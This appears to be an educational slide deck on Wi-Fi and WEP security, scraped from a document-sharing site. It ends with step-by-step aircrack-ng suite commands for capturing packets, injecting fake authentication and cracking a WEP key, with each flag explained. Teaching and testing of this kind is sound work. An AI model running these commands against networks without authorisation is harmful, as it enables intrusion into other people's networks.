Upload
quentin-harrison
View
233
Download
0
Tags:
Embed Size (px)
Citation preview
Background on Wi-FiBackground on Wi-Fi802.11over-the-air protocol
802.11a/b/g/n:SpeedsFrequenciesRange
◦Physical Obstructions ◦Example: Cordless Phone
Wireless Frames/PacketsWireless Frames/PacketsFraming:
◦Management - clear Authentication - encrypted
◦Control◦Data - encrypted
Error detection
Collecting FramesCollecting FramesImportant Part:
◦Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know.
◦Included in every authorization frame.
◦In some data frames.
Wired Equivalent Privacy Wired Equivalent Privacy (WEP)(WEP)1997, deprecatedIntended to protect dataPrevent unauthorized access to
the networkHexadecimal 64/128/256 bit keys
Authentication Authentication The client station sends an
authentication request to the Access Point.
The Access Point sends back a clear-text challenge.
The client has to encrypt the challenge text using the configured WEP key, and send it back in another authentication request.
The Access Point decrypts the material, and compares it with the clear-text it had sent. Depending on the success of this comparison, the Access Point sends back a positive or negative response.
War Chalking / War War Chalking / War DrivingDriving
War Chalking - practice of marking sidewalks and walls with special symbols to indicate that wireless access.
War Driving - driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks.
Alternative SecurityAlternative SecurityWPA/WPA2
◦random10 digit or longer key◦(1000) Single core computer 500
years to crackVPN
◦Required authentication◦Username/password
Cracking WEPCracking WEPTools = Aircrack-ng Suite / KismetKismet
◦Discover wireless networksAirodump-ng
◦Capturing packetsAircrack-ng
◦Brute force crack methodAireplay
◦Packet injection
Capture packetsCapture packets airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output
ath0
-c 9 is the channel for the wireless network --bssid 00:14:6C:7E:40:80 is the access point MAC
address. This eliminate extraneous traffic. -w capture is file name prefix for the file which will
contain the IVs. ath0 is the interface name.
Packet InjectionPacket Injection aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h
00:0F:B5:88:AC:82 ath0
-1 means fake authentication 0 reassociation timing in seconds -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:0F:B5:88:AC:82 is our card MAC address ath0 is the wireless interface name
Cracking the captured Cracking the captured packetspacketsaircrack-ng -b 00:14:6C:7E:40:80
output*.cap
-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
output*.cap selects all files starting with “output” and ending in ”.cap”.